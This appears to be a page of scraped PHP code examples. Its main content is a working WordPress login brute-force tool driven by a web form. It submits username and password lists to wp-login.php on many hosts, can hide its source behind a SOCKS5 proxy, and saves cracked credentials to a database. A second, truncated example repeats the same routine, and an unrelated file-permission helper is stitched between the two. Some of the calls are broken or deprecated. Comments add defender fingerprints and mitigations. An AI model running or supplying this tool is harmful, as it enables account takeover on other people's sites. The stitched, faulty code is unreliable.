Example #1
/**
 * Sample of a WordPress login brute-force routine driven by a web form.
 *
 * Reads three newline-separated lists from $_POST ('hosts', 'usernames', 'passwords').
 * For each host it submits username/password pairs to <host>/wp-login.php and stops at the
 * first response that contains "profile.php". Progress is echoed as HTML and a hit is
 * inserted into the `brute` table.
 *
 * Defender notes, all taken from the request this code builds:
 *  - Every attempt is a POST to /wp-login.php carrying log, pwd, wp-submit, redirect_to
 *    and testcookie=1. The wp-submit value is the constant "Giri" followed by the literal
 *    sequence "&#8207;", which is unusual in a form body and usable as a log/WAF fingerprint.
 *  - The first request to each host always uses http://, whatever scheme was supplied.
 *  - The loop has no delay between attempts, so a target sees a burst of login POSTs.
 *  - Traffic may arrive through a SOCKS5 proxy (USE_PROXY), so per-IP blocking alone is
 *    weak; per-account throttling or lockout and a second factor address the technique.
 *
 * filter(), RemoveLastSlash() and url_exists() are defined outside this listing; their
 * behaviour is not visible here.
 */
function wp_brute()
{
    // Only act when the form supplied all three lists.
    if (isset($_POST['hosts']) && isset($_POST['passwords']) && isset($_POST['usernames'])) {
        $conn = new mysqli(SQL_HOST, SQL_USER, SQL_PWD, SQL_DB);
        $hosts = trim(filter($_POST['hosts']));
        $passwords = trim(filter($_POST['passwords']));
        $usernames = trim(filter($_POST['usernames']));
        if ($passwords && $usernames && $hosts) {
            // One entry per line in each list.
            $hostsx = explode("\n", $hosts);
            $usersx = explode("\n", $usernames);
            $passsx = explode("\n", $passwords);
            echo '<div class="post">';
            echo '<h2 class="title"><a href="#">Results</a></h2>';
            echo '<div class="entry">';
            echo '<p class="meta"> Wordpress CMS Bruteforce &nbsp;&bull;&nbsp; Broken credentials will be stored in database';
            foreach ($hostsx as $host) {
                $host = RemoveLastSlash($host);
                // Per-host flag: set to 1 once a login attempt is judged successful.
                $hxd = 0;
                // Normalise the target: strip scheme and "www.", then force plain http://.
                $host = str_replace(array("http://", "https://", "www."), "", trim($host));
                $host = "http://" . $host;
                $wpAdmin = $host . '/wp-admin/';
                // Skip hosts for which url_exists() reports no wp-login.php.
                if (!url_exists($host . "/wp-login.php")) {
                    echo "<p>" . $host . " - <font color='#990000'>Login page not found</font></p>";
                    ob_flush();
                    flush();
                    continue;
                }
                foreach ($usersx as $username) {
                    foreach ($passsx as $password) {
                        // A fresh cURL handle is created for every single attempt.
                        $ch = curl_init();
                        // Optional SOCKS5 proxy, so the observed source address may not be the operator's.
                        if (USE_PROXY == 1) {
                            curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
                            curl_setopt($ch, CURLOPT_PROXY, PROXY_IP . ':' . PROXY_PORT);
                        }
                        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                        curl_setopt($ch, CURLOPT_URL, $host . '/wp-login.php');
                        // The same cookie file is used for every attempt and every host.
                        curl_setopt($ch, CURLOPT_COOKIEJAR, "coki.txt");
                        curl_setopt($ch, CURLOPT_COOKIEFILE, "coki.txt");
                        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                        curl_setopt($ch, CURLOPT_POST, TRUE);
                        // Fixed body layout: log, pwd, wp-submit, redirect_to, testcookie=1.
                        curl_setopt($ch, CURLOPT_POSTFIELDS, "log=" . $username . "&pwd=" . $password . "&wp-submit=Giri&#8207;" . "&redirect_to=" . $wpAdmin . "&testcookie=1");
                        $login = curl_exec($ch);
                        // Success heuristic: the final response (redirects followed) mentions "profile.php".
                        if (eregi("profile.php", $login)) {
                            $hxd = 1;
                            echo "<p>" . $host . " - Cracked! Username - <font color='#990000'>" . $username . "</font> & Password : <font color='#990000'>" . $password . "</font></p>";
                            // Record the hit as "<host>:80" and "<username>:<password>" in table `brute`.
                            mysqli_query($conn, "INSERT INTO brute(service, credentials) VALUES ('" . mysql_escape_string($host) . ":80', '" . mysql_escape_string($username) . ":" . mysql_escape_string($password) . "')", $conn);
                            ob_flush();
                            flush();
                            break;
                        }
                    }
                    // Leave the username loop too once this host has produced a hit.
                    if ($hxd == 1) {
                        break;
                    }
                }
                // No pair was accepted for this host.
                if ($hxd == 0) {
                    echo "<p>" . $host . " - <font color='#990000'>Failed</font></p>";
                    ob_flush();
                    flush();
                }
            }
            echo '</div></div>';
        } else {
            echo "<h2><font color='#990000'>All fields are required!</font></h3>";
        }
    }
    mysqli_close($conn);
}
/**
 * Checks whether a folder or file can be created.
 * If the file or folder would be created inside a directory without write permission, false is returned.
 *
 * The path obtained from GetPathName() is tested first; if it is not an existing directory,
 * trailing segments are removed one at a time until an existing directory is found. When no
 * such directory is found, the current working directory is tested instead.
 *
 * The answer is a point-in-time check only: permissions can change before the actual create,
 * so callers still have to handle a failing create.
 *
 * @param $FileName
 * @return bool
 */
function IsPossiblyCreated($FileName)
{
    // presumably GetPathName(..., false) yields the containing directory; verify against its definition
    $candidate = GetPathName(RemoveLastSlash($FileName), false);
    if (is_dir($candidate)) {
        return is_writable($candidate);
    }

    // One step up per '/' separator present in the starting path.
    $stepsLeft = substr_count($candidate, '/');
    while ($stepsLeft-- > 0) {
        $candidate = substr($candidate, 0, strrpos($candidate, '/'));
        if (is_dir($candidate)) {
            return is_writable($candidate);
        }
    }

    // No existing directory found along the path: fall back to the working directory.
    return is_writable('.');
}
Example #3
888888
999999';
        }
        echo '</textarea></td>
</tr>
<tr><td colspan="4"><center><br><input class="inputzbut" type="submit" name="submit" value="Brute Now"  /></center>';
        if ($_POST) {
            $hosts = trim(filter($_POST['hosts']));
            $passwords = trim(filter($_POST['passwords']));
            $usernames = trim(filter($_POST['usernames']));
            if ($passwords && $usernames && $hosts) {
                $hosts_explode = explode("\n", $hosts);
                $usernames_explode = explode("\n", $usernames);
                $passwords_explode = explode("\n", $passwords);
                foreach ($hosts_explode as $host) {
                    $host = RemoveLastSlash($host);
                    $hacked = 0;
                    $host = str_replace(array("http://", "https://", "www."), "", trim($host));
                    $host = "http://" . $host;
                    $wpAdmin = $host . '/wp-admin/';
                    if (!url_exists($host . "/wp-login.php")) {
                        echo "<p>" . $host . " => <font color='red'>Error In Login Page !</font></p>";
                        ob_flush();
                        flush();
                        continue;
                    }
                    foreach ($usernames_explode as $username) {
                        foreach ($passwords_explode as $password) {
                            $ch = curl_init();
                            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                            curl_setopt($ch, CURLOPT_URL, $host . '/wp-login.php');